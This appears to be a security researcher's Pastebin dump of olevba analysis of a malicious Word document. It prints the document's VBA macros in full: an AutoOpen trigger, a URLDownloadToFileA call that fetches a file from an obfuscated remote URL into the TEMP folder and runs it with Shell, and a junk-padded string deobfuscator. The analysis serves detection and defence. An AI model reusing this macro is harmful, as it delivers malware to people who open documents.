API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Mar 4th, 2015
659
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 4.75 KB | None | 0 0
raw download clone embed print report
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- document1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: document1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: document1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. yQtUv56E4r
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: document1.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. #If VBA7 Then
  29.     Private Declare PtrSafe Function sdfsdfsdfsdf Lib "urlmon" Alias _
  30.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  31.     ByVal gfhgfhF As String, _
  32.     ByVal hjkhgFF As String, _
  33.     ByVal gfhfghF As Long, _
  34.     ByVal gfdgdf As LongPtr) As LongPtr
  35. #Else
  36.     Private Declare Function sdfsdfsdfsdf Lib "urlmon" Alias _
  37.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  38.     ByVal gfhgfhF As String, _
  39.     ByVal hjkhgFF As String, _
  40.     ByVal gfhfghF As Long, _
  41.     ByVal gfdgdf As Long) As Long
  42. #End If
  43. Function ukQ2q73(o9Z_ As String, lb2tLi3yX9 As String) As Boolean
  44. vJHKBJdfkgfg = sdfsdfsdfsdf(0&, o9Z_, lb2tLi3yX9, 0&, 0&)
  45. Dim G32Q
  46. G32Q = Shell(lb2tLi3yX9, 1)
  47. End Function
  48.  
  49.  
  50.  
  51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  52. ANALYSIS:
  53. +------------+--------------------+-----------------------------------------+
  54. | Type       | Keyword            | Description                             |
  55. +------------+--------------------+-----------------------------------------+
  56. | Suspicious | Lib                | May run code from a DLL                 |
  57. | Suspicious | Shell              | May run an executable file or a system  |
  58. |            |                    | command                                 |
  59. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  60. +------------+--------------------+-----------------------------------------+
  61. -------------------------------------------------------------------------------
  62. VBA MACRO Class1.cls
  63. in file: document1.doc - OLE stream: u'Macros/VBA/Class1'
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. (empty macro)
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: document1.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  71. Public Function wNLiDcUQctHeQbyt(TRQIOVnNMdSVNmP As String) As String
  72. GoTo GiChFYjYUOh
  73. GiChFYjYUOh:
  74. GoTo lvBxJabwyHfMp
  75. lvBxJabwyHfMp:
  76. For saOjZPeoQQJJ = 1 To Len(TRQIOVnNMdSVNmP) Step 2
  77. GoTo LTIokkjoZR
  78. LTIokkjoZR:
  79. GoTo ePgjmeCgKuqfzq
  80. ePgjmeCgKuqfzq:
  81. wNLiDcUQctHeQbyt = wNLiDcUQctHeQbyt & Mid(TRQIOVnNMdSVNmP, saOjZPeoQQJJ, 1)
  82. GoTo nnaMoKQlSkVaAo
  83. nnaMoKQlSkVaAo:
  84. GoTo xuRnLR
  85. xuRnLR:
  86. GoTo drMOY
  87. drMOY:
  88. Next
  89. GoTo VoIcVLrAAzEpipT
  90. VoIcVLrAAzEpipT:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Module3.bas
  98. in file: document1.doc - OLE stream: u'Macros/VBA/Module3'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. Sub yQtUv56E4r()
  101. ukQ2q73 wNLiDcUQctHeQbyt("h„tTtep}:O/u/Mr{e:tkr:oP-DmgoGtsoS.hcsbla‚.?p[lj/mjsI/?bwi{nU.be†x2e‚"), Environ(wNLiDcUQctHeQbyt("T8M}P-")) & wNLiDcUQctHeQbyt("\9G1HHjhk…d/j2fDgrjhk=G@KJ'.Le\xGe„")
  102. End Sub
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104. ANALYSIS:
  105. +------------+---------+---------------------------------------+
  106. | Type       | Keyword | Description                           |
  107. +------------+---------+---------------------------------------+
  108. | Suspicious | Environ | May read system environment variables |
  109. +------------+---------+---------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!